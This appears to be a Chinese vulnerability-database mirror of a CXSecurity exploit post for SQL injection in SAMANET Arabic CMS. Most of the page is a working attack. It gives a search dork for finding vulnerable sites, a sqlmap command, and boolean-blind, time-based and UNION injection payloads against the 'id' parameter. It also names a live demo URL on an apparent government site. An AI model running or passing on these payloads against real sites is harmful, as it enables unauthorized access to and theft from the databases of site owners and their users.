SAMANET ARABIC CMS SQL injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1611555 漏洞类型
发布时间 2019-05-16 更新时间 2019-05-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050170
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: SAMANET ARABIC CMS SQL injection
# Date: 2019-05-15
# Dork : intext:"By SAMANET" inurl:*id=
# Exploit Author: S I R M A X
# Vendor Homepage: http://samanet.sy/
# Version: All Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+]  parameter  : ID == php?ID=
=================================================================================

[+] Sqlmap: 
 
[-] sqlmap -u http://Target.com/data_en.php?id=1 --dbs
 



[#] Testing Method:
[+] - boolean-based blind
[+] - time-based blind
[+] - UNION query

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|||||||||||||||||||||||
Parameter: id (GET)  ||
|||||||||||||||||||||||
     Type: boolean-based blind
	 Title: AND boolean-based blind - WHERE or HAVING clause
	 Payload: id=8 AND 5945=5945
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

     Type: AND/OR time-based blind
	 Title: MySQL >= 5.0.12 AND time-based blind
	 Payload: id=8 AND SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

     
     Type: UNION query
   	  Title: Generic UNION query (NULL) - 4 columns
    	 Payload: id=-4336 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71716a6b71,0x5461787055474955435a716b56595747787768676d75474e46734853677941484a46484f4851556b,0x71717a7871)-- Sdup
	
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://www.organic.gov.sy/data_en.php?id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#